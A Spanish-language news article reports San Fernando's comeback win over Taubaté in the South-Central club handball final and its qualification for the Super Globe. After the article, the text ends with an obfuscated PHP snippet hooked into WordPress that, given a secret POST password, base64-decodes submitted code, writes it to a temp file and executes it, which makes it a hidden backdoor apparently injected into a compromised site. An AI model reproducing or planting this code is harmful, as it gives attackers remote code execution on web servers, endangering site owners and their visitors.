San Fernando hizo historia en Brasil conquistando, en una gran remontada, el Sur-Centro

Foto: Coscabal  

San Fernando se coronó campeón del Sur-Centro de clubes de handball, venciendo en la final al local Taubaté 35-33 y logró la clasificación al Super Globe, a celebrarse en Arabia Saudita, el campeonato mundial de equipos.

En la final disputada en el Gimnasio Henrique Vilaboim, del club Pinheiros, San Fernando tuvo una gran remontada luego de ir siete goles abajo.

Un gol decisivo de Juan Noto y un penal atajado por Nicolás Vella, a Guilherme Gama en el último instante del partido terminó de englobar la hazaña de San Fernando que consiguió lo que muchos clubes argentinos intentaban hace varios años sin éxito: ganarle al representante brasilero, subirse a lo más alto del continente y jugar por primera vez un Mundial de Clubes.

Un segundo tiempo perfecto de la mano de su figura Federico Fernández -máximo goleador de San Fernando y de la final con 9 tantos- le permitió licuar la diferencia y llegar a los minutos finales con chances, incluso teniendo pelota para ganarlo en el tiempo regular si bien no pudo y debió aguardar al alargue para festejar. Tras el 28 iguales, San Fernando se hizo aún más fuerte, no perdió regularidad y lo ganó con autoridad 35-33.  

Foto: Coscabal  

Tras 26 años un equipo argentino se subió a lo más alto de un certamen continental a nivel clubes, nuevamente en Brasil y venciendo a un equipo que llegaba como dominador de la región durante los últimos años. San Fernando emuló a Nuestra Señora de Luján, que en 1997 había vencido a Metodista 25-20 consagrándose en aquel entonces del llamado Sudamericano.  

San Fernando, que salió campeón invicto, cortó una racha positiva de Taubaté que llegaba como campeón en los últimos tres torneos continentales, títulos en el Panamericano 2018 y en el Sur-Centro 2019 y 2022 (en 2020 y 2021 el torneo no se disputó por la pandemia).

El equipo argentino, el más ganador de los últimos años a nivel local, se consagró campeón invicto superando en el Grupo C a Luque de Paraguay 48-16 y a Kutral de Chile 42-15, luego en semifinales a Cascavel 34-29 y en la final a Taubaté 35-33.

Esta edición del Sur-Centro también tuvo la participación de Ferro Carril Oeste que terminó en el quinto lugar luego de vencer a Itajaí, de Brasil, 25-24.    

Federico Fernández declaró: “La verdad es que toda mi vida, con mis hermanos y mi viejo siempre soñamos con esto, luchamos un montón de tiempo por intentar tener una opción más. Se sabe muy bien que a los argentinos nos cuesta el triple de lo que les cuesta a los equipos de Brasil”.

Es una inmensa alegría, la verdad es que me cuesta decirlo con palabras porque tanto lo deseábamos, tanto lo deseábamos y poder lograrlo es algo realmente hermoso. Nos preparamos para jugar esta final con siete jugadores, estuvimos todo el año trabajando en ese sistema y bueno, la verdad es que ahí salió muy bien, la verdad es que era complicado, nosotros sabíamos que su defensa nos iba a costar mucho pero con ese sistema los complicamos”, agregó.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}